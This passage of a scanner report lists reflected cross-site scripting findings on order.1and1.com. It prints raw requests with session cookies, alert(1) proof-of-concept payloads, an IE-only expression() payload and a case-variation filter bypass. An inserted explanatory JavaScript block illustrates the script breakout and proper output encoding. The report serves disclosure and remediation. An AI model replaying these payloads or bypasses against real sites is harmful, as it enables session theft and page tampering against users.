Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:47 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:57:54 GMT; Path=/
ETag: 905cca0b4e9d618ff10d04815b3bba6b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20910


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ams.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingElements";UNOUNO.params.lastpage="FeatureSite-buildingElements5314a</ScRiPt >fdf961380df";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.13. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingPhotogallery is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingPhotogallery. The payload 99bea</ScRiPt%20>57d930332ed was submitted in the REST URL parameter 3. This input was returned as 99bea</ScRiPt >57d930332ed in a subsequent request for the URL /xml/order/FeatureSite-buildingPhotogallery.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingPhotogallery99bea</ScRiPt%20>57d930332ed;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:57:23 GMT; Path=/
ETag: 22783426aba0c8ad3815820a1b8c7156
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19319


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingPhotogallery";UNOUNO.params.lastpage="FeatureSite-buildingPhotogallery99bea</ScRiPt >57d930332ed";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.14. http://order.1and1.com/xml/order/FeatureSite-buildingWsb [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingWsb is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingWsb. The payload 8a254</ScRiPt%20>517ec0551f8 was submitted in the REST URL parameter 3. This input was returned as 8a254</ScRiPt >517ec0551f8 in a subsequent request for the URL /xml/order/FeatureSite-buildingWsb.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingWsb8a254</ScRiPt%20>517ec0551f8;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=IdGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:56:27 GMT; Path=/
ETag: 64072c23e0b5d7c6b127c44390fcf074
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20609


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingWsb";UNOUNO.params.lastpage="FeatureSite-buildingWsb8a254</ScRiPt >517ec0551f8";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.15. http://order.1and1.com/xml/order/Gtc [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Gtc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Gtc. The payload c5e5c</ScRiPt%20>78e706dc8a4 was submitted in the REST URL parameter 3. This input was returned as c5e5c</ScRiPt >78e706dc8a4 in a subsequent request for the URL /xml/order/Gtc.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Gtcc5e5c</ScRiPt%20>78e706dc8a4;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:51:20 GMT; Path=/
ETag: 293710f7dfa5ab5aebccd23aa4af1cf6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 119585


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
007652F99CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Gtc";UNOUNO.params.lastpage="Gtcc5e5c</ScRiPt >78e706dc8a4";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.16. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload 92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d was submitted in the REST URL parameter 3. This input was returned as 92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d in a subsequent request for the URL /xml/order/Home.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
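The remediation advice repeated under each issue above (1.9 through 1.16), together with the note that the filter is defeated by case variation, is illustrated by the following added example. It is not code from the XSS.CX report or from the 1and1 application: the blacklist filter is a hypothetical reconstruction of the behaviour the report describes, and the `UNOUNO.params.lastpage` assignment is modelled on the fragment visible in every Response 2. It shows why `</ScRiPt >` ends the inline script even though the JavaScript string literal was never closed, and what correct output encoding for a JavaScript string context looks like.

```javascript
// Added example (not code from the XSS.CX report or from the 1and1
// application). It models the pattern visible in every Response 2 above: a
// URL path segment ends up inside an inline <script> as
//   UNOUNO.params.lastpage="<value>";
// and contrasts a hypothetical case-sensitive blacklist with proper output
// encoding for a JavaScript string context.

// Payload from issue 1.9, URL-decoded (the form the server echoed back).
const PAYLOAD =
  'FeatureMarketingCtrStatccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82';

// Hypothetical blacklist of the kind the report describes: it strips the
// lower-case tag names but never matches "ScRiPt".
function blacklistFilter(value) {
  return value.replace(/<script/g, '').replace(/<\/script>/g, '');
}

// The HTML tokenizer, not the JavaScript engine, decides where an inline
// script ends: in script-data state "</" followed by the ASCII
// case-insensitive letters "script" and then whitespace, "/" or ">" closes
// the element. That is why "</ScRiPt >" works although the surrounding
// JavaScript string literal was never terminated with a double quote.
const SCRIPT_END = /<\/script[\s\/>]/i;

// True if `value`, placed verbatim inside <script>...</script>, would end the
// script element before the application's own closing tag.
function breaksOutOfScript(value) {
  return SCRIPT_END.test(value);
}

// Encoder for a JavaScript string literal: everything outside [A-Za-z0-9]
// becomes \uXXXX (one escape per UTF-16 code unit, so surrogate pairs are
// covered too). The HTML parser then never sees "<", "/" or ">", and the
// JavaScript parser never sees an unescaped quote, backslash or line
// terminator.
function encodeForJsString(value) {
  let out = '';
  for (let i = 0; i < value.length; i++) {
    const code = value.charCodeAt(i);
    const isAlnum =
      (code >= 0x30 && code <= 0x39) ||
      (code >= 0x41 && code <= 0x5a) ||
      (code >= 0x61 && code <= 0x7a);
    out += isAlnum ? value[i] : '\\u' + code.toString(16).padStart(4, '0');
  }
  return out;
}

// The two ways of building the inline script fragment seen in the responses.
function renderUnsafe(lastpage) {
  return `<script>UNOUNO.params.lastpage="${blacklistFilter(lastpage)}";</script>`;
}
function renderSafe(lastpage) {
  return `<script>UNOUNO.params.lastpage="${encodeForJsString(lastpage)}";</script>`;
}

// What the JavaScript engine reads back from the encoded literal: JSON string
// syntax accepts exactly the \uXXXX escapes emitted above, so the original
// value survives unchanged.
function decodeJsLiteral(encoded) {
  return JSON.parse('"' + encoded + '"');
}

function demo() {
  console.log('blacklist left payload intact :', blacklistFilter(PAYLOAD) === PAYLOAD);
  console.log('unsafe fragment ends script   :', breaksOutOfScript(blacklistFilter(PAYLOAD)));
  console.log('encoded fragment ends script  :', breaksOutOfScript(encodeForJsString(PAYLOAD)));
  console.log('round trip preserved value    :', decodeJsLiteral(encodeForJsString(PAYLOAD)) === PAYLOAD);
  console.log(renderSafe(PAYLOAD));
}
demo();
```

The `breaksOutOfScript` check is the condition the "Firm" findings (1.10, 1.12 to 1.15) already satisfy: once `</ScRiPt >` has closed the script element, whatever follows is parsed as HTML, so a missing full proof-of-concept reflects the scanner's payload set, not a safe context. HTML entity encoding does not help here, because entities are not decoded inside `<script>`; the value must be encoded for the JavaScript string literal it lands in, and the same rule applies to the other `UNOUNO.params` values built from session state in that block.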

Request 1

GET /xml/order/Home92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Request 2

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:51:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTsuN2dwNikqJiUqJiQnJR8nHh0=; Expires=Fri, 07-Apr-2079 18:05:35 GMT; Path=/
ETag: 4aadadff388b28b120b90eb8b912244d
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36484


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
386BD5F5ED9C6322067094898.TCpfix140a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Home";UNOUNO.params.lastpage="Home92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.17. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload 2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308 was submitted in the REST URL parameter 3. This input was returned as 2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308 in a subsequent request for the URL /xml/order/Hosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Hosting2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
